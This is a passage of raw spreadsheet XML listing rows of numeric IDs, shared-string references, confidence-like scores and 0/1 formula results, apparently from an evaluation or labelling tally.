        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L425" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O425" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="426">
      <c r="A426" s="62">
        <v>18845.0</v>
      </c>
      <c r="B426" s="62" t="s">
        <v>67</v>
      </c>
      <c r="C426" s="63" t="s">
        <v>1464</v>
      </c>
      <c r="D426" s="62" t="s">
        <v>1465</v>
      </c>
      <c r="E426" s="62" t="s">
        <v>1466</v>
      </c>
      <c r="F426" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G426" s="62">
        <v>0.95</v>
      </c>
      <c r="H426" s="64">
        <v>1.0</v>
      </c>
      <c r="I426" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J426" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K426" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L426" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O426" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="427">
      <c r="A427" s="62">
        <v>18872.0</v>
      </c>
      <c r="B427" s="62" t="s">
        <v>67</v>
      </c>
      <c r="C427" s="63" t="s">
        <v>1467</v>
      </c>
      <c r="D427" s="62" t="s">
        <v>1468</v>
      </c>
      <c r="E427" s="62" t="s">
        <v>1469</v>
      </c>
      <c r="F427" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G427" s="62">
        <v>0.9</v>
      </c>
      <c r="H427" s="64">
        <v>1.0</v>
      </c>
      <c r="I427" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J427" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K427" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L427" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O427" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="428">
      <c r="A428" s="62">
        <v>18884.0</v>
      </c>
      <c r="B428" s="62" t="s">
        <v>67</v>
      </c>
      <c r="C428" s="63" t="s">
        <v>1470</v>
      </c>
      <c r="D428" s="62" t="s">
        <v>1471</v>
      </c>
      <c r="E428" s="62" t="s">
        <v>1472</v>
      </c>
      <c r="F428" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G428" s="62">
        <v>0.9</v>
      </c>
      <c r="H428" s="64">
        <v>0.0</v>
      </c>
      <c r="I428" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J428" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K428" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L428" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O428" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="429">
      <c r="A429" s="62">
        <v>18887.0</v>
      </c>
      <c r="B429" s="62" t="s">
        <v>67</v>
      </c>
      <c r="C429" s="63" t="s">
        <v>1473</v>
      </c>
      <c r="D429" s="66" t="s">
        <v>1474</v>
      </c>
      <c r="E429" s="62" t="s">
        <v>1475</v>
      </c>
      <c r="F429" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G429" s="62">
        <v>0.9</v>
      </c>
      <c r="H429" s="64">
        <v>1.0</v>
      </c>
      <c r="I429" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J429" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K429" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L429" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O429" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="430">
      <c r="A430" s="62">
        <v>18949.0</v>
      </c>
      <c r="B430" s="62" t="s">
        <v>67</v>
      </c>
      <c r="C430" s="63" t="s">
        <v>1476</v>
      </c>
      <c r="D430" s="62" t="s">
        <v>1477</v>
      </c>
      <c r="E430" s="62" t="s">
        <v>1478</v>
      </c>
      <c r="F430" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G430" s="62">
        <v>0.95</v>
      </c>
      <c r="H430" s="64">
        <v>0.0</v>
      </c>
      <c r="I430" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J430" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K430" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L430" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O430" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="431">
      <c r="A431" s="62">
        <v>18991.0</v>
      </c>
      <c r="B431" s="62" t="s">
        <v>67</v>
      </c>
      <c r="C431" s="63" t="s">
        <v>1479</v>
      </c>
      <c r="D431" s="62" t="s">
        <v>1480</v>
      </c>
      <c r="E431" s="62" t="s">
        <v>1481</v>
      </c>
      <c r="F431" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G431" s="62">
        <v>0.95</v>
      </c>
      <c r="H431" s="64">
        <v>1.0</v>
      </c>
      <c r="I431" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J431" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K431" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L431" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O431" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="432">
      <c r="A432" s="62">
        <v>18999.0</v>
      </c>
      <c r="B432" s="62" t="s">
        <v>67</v>
      </c>
      <c r="C432" s="63" t="s">
        <v>1482</v>
      </c>
      <c r="D432" s="62" t="s">
        <v>1483</v>
      </c>
      <c r="E432" s="62" t="s">
        <v>1484</v>
      </c>
      <c r="F432" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G432" s="62">
        <v>0.95</v>
      </c>
      <c r="H432" s="64">
        <v>0.0</v>
      </c>
      <c r="I432" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J432" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K432" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L432" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O432" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="433">
      <c r="A433" s="62">
        <v>19166.0</v>
      </c>
      <c r="B433" s="62" t="s">
        <v>67</v>
      </c>
      <c r="C433" s="63" t="s">
        <v>1485</v>
      </c>
      <c r="D433" s="62" t="s">
        <v>1486</v>
      </c>
      <c r="E433" s="62" t="s">
        <v>1487</v>
      </c>
      <c r="F433" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G433" s="62">
        <v>0.9</v>
      </c>
      <c r="H433" s="64">
        <v>0.0</v>
      </c>
      <c r="I433" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J433" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K433" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L433" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O433" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="434">
      <c r="A434" s="62">
        <v>19225.0</v>
      </c>
      <c r="B434" s="62" t="s">
        <v>67</v>
      </c>
      <c r="C434" s="63" t="s">
        <v>1488</v>
      </c>
      <c r="D434" s="62" t="s">
        <v>1489</v>
      </c>
      <c r="E434" s="62" t="s">
        <v>1490</v>
      </c>
      <c r="F434" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G434" s="62">
        <v>0.9</v>
      </c>
      <c r="H434" s="64">
        <v>0.0</v>
      </c>
      <c r="I434" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J434" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K434" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L434" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O434" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="435">
      <c r="A435" s="62">
        <v>19230.0</v>
      </c>
      <c r="B435" s="62" t="s">
        <v>67</v>
      </c>
      <c r="C435" s="63" t="s">
        <v>1491</v>
      </c>
      <c r="D435" s="62" t="s">
        <v>1492</v>
      </c>
      <c r="E435" s="62" t="s">
        <v>1493</v>
      </c>
      <c r="F435" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G435" s="62">
        <v>0.85</v>
      </c>
      <c r="H435" s="64">
        <v>0.0</v>
      </c>
      <c r="I435" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J435" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K435" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L435" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O435" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="436">
      <c r="A436" s="62">
        <v>19279.0</v>
      </c>
      <c r="B436" s="62" t="s">
        <v>67</v>
      </c>
      <c r="C436" s="63" t="s">
        <v>1494</v>
      </c>
      <c r="D436" s="62" t="s">
        <v>1495</v>
      </c>
      <c r="E436" s="62" t="s">
        <v>1496</v>
      </c>
      <c r="F436" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G436" s="62">
        <v>0.9</v>
      </c>
      <c r="H436" s="64">
        <v>0.0</v>
      </c>
      <c r="I436" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J436" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K436" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L436" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O436" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="437">
      <c r="A437" s="62">
        <v>19281.0</v>
      </c>
      <c r="B437" s="62" t="s">
        <v>67</v>
      </c>
      <c r="C437" s="63" t="s">
        <v>1497</v>
      </c>
      <c r="D437" s="62" t="s">
        <v>1498</v>
      </c>
      <c r="E437" s="62" t="s">
        <v>1499</v>
      </c>
      <c r="F437" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G437" s="62">
        <v>0.9</v>
      </c>
      <c r="H437" s="64">
        <v>0.0</v>
      </c>
      <c r="I437" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J437" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K437" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L437" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O437" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="438">
      <c r="A438" s="62">
        <v>19322.0</v>
      </c>
      <c r="B438" s="62" t="s">
        <v>67</v>
      </c>
      <c r="C438" s="63" t="s">
        <v>1500</v>
      </c>
      <c r="D438" s="62" t="s">
        <v>1501</v>
      </c>
      <c r="E438" s="62" t="s">
        <v>1502</v>
      </c>
      <c r="F438" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G438" s="62">
        <v>0.85</v>
      </c>
      <c r="H438" s="64">
        <v>0.0</v>
      </c>
      <c r="I438" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J438" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K438" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L438" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O438" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="439">
      <c r="A439" s="62">
        <v>11.0</v>
      </c>
      <c r="B439" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C439" s="63" t="s">
        <v>1503</v>
      </c>
      <c r="D439" s="62" t="s">
        <v>1504</v>
      </c>
      <c r="E439" s="62" t="s">
        <v>1505</v>
      </c>
      <c r="F439" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G439" s="62">
        <v>0.9</v>
      </c>
      <c r="H439" s="64">
        <v>1.0</v>
      </c>
      <c r="I439" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J439" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K439" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L439" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O439" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="440">
      <c r="A440" s="62">
        <v>23.0</v>
      </c>
      <c r="B440" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C440" s="63" t="s">
        <v>1506</v>
      </c>
      <c r="D440" s="62" t="s">
        <v>1507</v>
      </c>
      <c r="E440" s="62" t="s">
        <v>1508</v>
      </c>
      <c r="F440" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G440" s="62">
        <v>0.9</v>
      </c>
      <c r="H440" s="64">
        <v>0.0</v>
      </c>
      <c r="I440" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J440" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K440" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L440" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O440" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="441">
      <c r="A441" s="62">
        <v>24.0</v>
      </c>
      <c r="B441" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C441" s="63" t="s">
        <v>1509</v>
      </c>
      <c r="D441" s="62" t="s">
        <v>1510</v>
      </c>
      <c r="E441" s="62" t="s">
        <v>1511</v>
      </c>
      <c r="F441" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G441" s="62">
        <v>0.9</v>
      </c>
      <c r="H441" s="64">
        <v>1.0</v>
      </c>
      <c r="I441" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J441" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K441" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L441" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O441" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="442">
      <c r="A442" s="62">
        <v>33.0</v>
      </c>
      <c r="B442" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C442" s="63" t="s">
        <v>1512</v>
      </c>
      <c r="D442" s="62" t="s">
        <v>1513</v>
      </c>
      <c r="E442" s="62" t="s">
        <v>1514</v>
      </c>
      <c r="F442" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G442" s="62">
        <v>0.9</v>
      </c>
      <c r="H442" s="64">
        <v>1.0</v>
      </c>
      <c r="I442" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J442" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K442" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L442" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O442" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="443">
      <c r="A443" s="62">
        <v>40.0</v>
      </c>
      <c r="B443" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C443" s="63" t="s">
        <v>1515</v>
      </c>
      <c r="D443" s="62" t="s">
        <v>1516</v>
      </c>
      <c r="E443" s="62" t="s">
        <v>1517</v>
      </c>
      <c r="F443" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G443" s="62">
        <v>0.85</v>
      </c>
      <c r="H443" s="64">
        <v>1.0</v>
      </c>
      <c r="I443" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J443" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K443" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L443" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O443" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="444">
      <c r="A444" s="62">
        <v>65.0</v>
      </c>
      <c r="B444" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C444" s="63" t="s">
        <v>1518</v>
      </c>
      <c r="D444" s="62" t="s">
        <v>1519</v>
      </c>
      <c r="E444" s="62" t="s">
        <v>1520</v>
      </c>
      <c r="F444" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G444" s="62">
        <v>0.9</v>
      </c>
      <c r="H444" s="64">
        <v>1.0</v>
      </c>
      <c r="I444" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J444" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K444" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L444" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O444" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="445">
      <c r="A445" s="62">
        <v>185.0</v>
      </c>
      <c r="B445" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C445" s="63" t="s">
        <v>1521</v>
      </c>
      <c r="D445" s="62" t="s">
        <v>1522</v>
      </c>
      <c r="E445" s="62" t="s">
        <v>1523</v>
      </c>
      <c r="F445" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G445" s="62">
        <v>0.9</v>
      </c>
      <c r="H445" s="64">
        <v>0.0</v>
      </c>
      <c r="I445" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J445" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K445" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L445" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O445" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="446">
      <c r="A446" s="62">
        <v>238.0</v>
      </c>
      <c r="B446" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C446" s="63" t="s">
        <v>1524</v>
      </c>
      <c r="D446" s="62" t="s">
        <v>1525</v>
      </c>
      <c r="E446" s="62" t="s">
        <v>1526</v>
      </c>
      <c r="F446" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G446" s="62">
        <v>0.85</v>
      </c>
      <c r="H446" s="64">
        <v>1.0</v>
      </c>
      <c r="I446" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J446" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K446" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L446" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O446" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="447">
      <c r="A447" s="62">
        <v>241.0</v>
      </c>
      <c r="B447" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C447" s="63" t="s">
        <v>1527</v>
      </c>
      <c r="D447" s="62" t="s">
        <v>1528</v>
      </c>
      <c r="E447" s="62" t="s">
        <v>1529</v>
      </c>
      <c r="F447" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G447" s="62">
        <v>0.85</v>
      </c>
      <c r="H447" s="64">
        <v>1.0</v>
      </c>
      <c r="I447" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J447" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K447" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L447" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O447" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="448">
      <c r="A448" s="62">
        <v>267.0</v>
      </c>
      <c r="B448" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C448" s="63" t="s">
        <v>1530</v>
      </c>
      <c r="D448" s="62" t="s">
        <v>1531</v>
      </c>
      <c r="E448" s="62" t="s">
        <v>1532</v>
      </c>
      <c r="F448" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G448" s="62">
        <v>0.9</v>
      </c>
      <c r="H448" s="64">
        <v>0.0</v>
      </c>
      <c r="I448" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J448" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K448" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L448" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O448" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="449">
      <c r="A449" s="62">
        <v>288.0</v>
      </c>
      <c r="B449" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C449" s="63" t="s">
        <v>1533</v>
      </c>
      <c r="D449" s="62" t="s">
        <v>1534</v>
      </c>
      <c r="E449" s="62" t="s">
        <v>1535</v>
      </c>
      <c r="F449" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G449" s="62">
        <v>0.85</v>
      </c>
      <c r="H449" s="64">
        <v>1.0</v>
      </c>
      <c r="I449" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J449" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K449" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L449" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O449" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="450">
      <c r="A450" s="62">
        <v>290.0</v>
      </c>
      <c r="B450" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C450" s="63" t="s">
        <v>1536</v>
      </c>
      <c r="D450" s="62" t="s">
        <v>1537</v>
      </c>
      <c r="F450" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G450" s="62">
        <v>0.85</v>
      </c>
      <c r="H450" s="64">
        <v>1.0</v>
      </c>
      <c r="I450" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J450" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K450" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L450" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O450" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="451">
      <c r="A451" s="62">
        <v>291.0</v>
      </c>
      <c r="B451" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C451" s="63" t="s">
        <v>1538</v>
      </c>
      <c r="D451" s="62" t="s">
        <v>1539</v>
      </c>
      <c r="E451" s="62" t="s">
        <v>1540</v>
      </c>
      <c r="F451" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G451" s="62">
        <v>0.9</v>
      </c>
      <c r="H451" s="64">
        <v>0.0</v>
      </c>
      <c r="I451" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J451" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K451" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L451" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O451" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="452">
      <c r="A452" s="62">
        <v>295.0</v>
      </c>
      <c r="B452" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C452" s="63" t="s">
        <v>1541</v>
      </c>
      <c r="D452" s="62" t="s">
        <v>1542</v>
      </c>
      <c r="E452" s="62" t="s">
        <v>1543</v>
      </c>
      <c r="F452" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G452" s="62">
        <v>0.85</v>
      </c>
      <c r="H452" s="64">
        <v>0.0</v>
      </c>
      <c r="I452" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J452" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K452" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L452" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O452" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="453">
      <c r="A453" s="62">
        <v>297.0</v>
      </c>
      <c r="B453" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C453" s="63" t="s">
        <v>1544</v>
      </c>
      <c r="D453" s="62" t="s">
        <v>1545</v>
      </c>
      <c r="E453" s="62" t="s">
        <v>1546</v>
      </c>
      <c r="F453" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G453" s="62">
        <v>0.95</v>
      </c>
      <c r="H453" s="64">
        <v>1.0</v>
      </c>
      <c r="I453" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J453" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K453" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L453" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O453" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="454">
      <c r="A454" s="62">
        <v>315.0</v>
      </c>
      <c r="B454" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C454" s="63" t="s">
        <v>1547</v>
      </c>
      <c r="D454" s="62" t="s">
        <v>1548</v>
      </c>
      <c r="E454" s="62" t="s">
        <v>1549</v>
      </c>
      <c r="F454" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G454" s="62">
        <v>0.9</v>
      </c>
      <c r="H454" s="64">
        <v>1.0</v>
      </c>
      <c r="I454" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J454" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K454" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L454" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O454" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="455">
      <c r="A455" s="62">
        <v>343.0</v>
      </c>
      <c r="B455" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C455" s="63" t="s">
        <v>1550</v>
      </c>
      <c r="D455" s="62" t="s">
        <v>1551</v>
      </c>
      <c r="E455" s="62" t="s">
        <v>1552</v>
      </c>
      <c r="F455" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G455" s="62">
        <v>0.9</v>
      </c>
      <c r="H455" s="64">
        <v>0.0</v>
      </c>
      <c r="I455" s="64" t="s">
        <v>158</v>
      </c>
      <c r="J455" s="65">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="K455" s="65">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="L455" s="65">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="O455" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="456">
      <c r="A456" s="62">
        <v>348.0</v>
      </c>
      <c r="B456" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C456" s="63" t="s">
        <v>1553</v>
      </c>
      <c r="D456" s="62" t="s">
        <v>1554</v>
      </c>
      <c r="E456" s="62" t="s">
        <v>1555</v>
      </c>
      <c r="F456" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G456" s="62">
        <v>0.95</v>
      </c>
      <c r="H456" s="64">
        <v>1.0</v>
      </c>
      <c r="I456" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J456" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K456" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L456" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O456" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="457">
      <c r="A457" s="62">
        <v>388.0</v>
      </c>
      <c r="B457" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C457" s="63" t="s">
        <v>1556</v>
      </c>
      <c r="D457" s="62" t="s">
        <v>1557</v>
      </c>
      <c r="E457" s="62" t="s">
        <v>1558</v>
      </c>
      <c r="F457" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G457" s="62">
        <v>0.9</v>
      </c>
      <c r="H457" s="64">
        <v>1.0</v>
      </c>
      <c r="I457" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J457" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K457" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L457" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O457" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="458">
      <c r="A458" s="62">
        <v>400.0</v>
      </c>
      <c r="B458" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C458" s="63" t="s">
        <v>1559</v>
      </c>
      <c r="D458" s="62" t="s">
        <v>1560</v>
      </c>
      <c r="E458" s="62" t="s">
        <v>1561</v>
      </c>
      <c r="F458" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G458" s="62">
        <v>0.9</v>
      </c>
      <c r="H458" s="64">
        <v>1.0</v>
      </c>
      <c r="I458" s="64" t="s">
        <v>134</v>
      </c>
      <c r="J458" s="65">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="K458" s="65">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="L458" s="65">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="O458" s="62">
        <v>1.0</v>
      </c>
    </row>
    <row r="459">
      <c r="A459" s="62">
        <v>410.0</v>
      </c>
      <c r="B459" s="62" t="s">
        <v>69</v>
      </c>
      <c r="C459" s="63" t="s">
        <v>1562</v>
      </c>
      <c r="D459" s="62" t="s">
        <v>1563</v>
      </c>
      <c r="E459" s="62" t="s">
        <v>1564</v>
      </c>
      <c r="F459" s="62" t="s">
        <v>134</v>
      </c>
      <c r="G459" s="62">
        <v>0.9</v>
      </c>
      <c r="H459" s="64">
        <v>1.0</v>
      </c>
